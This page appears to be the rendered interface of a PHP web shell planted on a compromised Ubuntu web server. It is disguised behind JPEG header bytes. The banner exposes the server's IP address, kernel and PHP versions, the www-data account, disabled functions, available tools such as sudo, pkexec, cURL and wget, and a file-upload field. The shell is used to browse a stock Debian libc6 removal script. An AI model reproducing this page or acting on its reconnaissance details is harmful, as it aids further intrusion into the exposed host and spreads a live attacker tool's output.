????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/var/lib/dpkg/info_silent/ |
Upload File : |
#! /bin/sh
set -e
if [ "$1" = remove ]; then
if command -v suidunregister >/dev/null 2>&1 && [ -e /etc/suid.conf ]; then
if [ -x /usr/lib/pt_chown ]; then
suidunregister -s libc6 /usr/lib/pt_chown
elif [ -x /usr/libexec/pt_chown ]; then
suidunregister -s libc6 /usr/libexec/pt_chown
fi
fi
# When both the multiarch and the corresponding biarch packages are
# installed, removing the multiarch package will remove the dynamic
# linker. Recreate it in the postinst.
ARCH=${DPKG_MAINTSCRIPT_ARCH:-$(dpkg --print-architecture)}
case "${ARCH}" in
kfreebsd-i386 | s390 | powerpc)
target="/lib32/ld.so.1"
;;
i386 | sparc)
target="/lib32/ld-linux.so.2"
;;
*)
target="$(dpkg-query -L libc6-${ARCH} 2>/dev/null | grep -E '/lib.*/ld-[0-9.]+\.so$' || true)"
;;
esac
if [ -f "$target" ] && ! [ -f /lib64/ld-linux-x86-64.so.2 ] ; then
ln -sf ${target#$(dirname /lib64/ld-linux-x86-64.so.2)/} /lib64/ld-linux-x86-64.so.2
fi
fi
if [ "$1" = deconfigure ]; then
:; # blah, do something useful with ldso
fi
#if [ "$1" = purge ]; then
# update-rc.d mountkernfs remove > /dev/null
#fi
# Automatically added by dh_installdebconf
if [ "$1" = purge ] && [ -e /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
db_purge
fi
# End automatically added section
# Automatically added by dh_makeshlibs
if [ "$1" = "remove" ]; then
ldconfig
fi
# End automatically added section
exit 0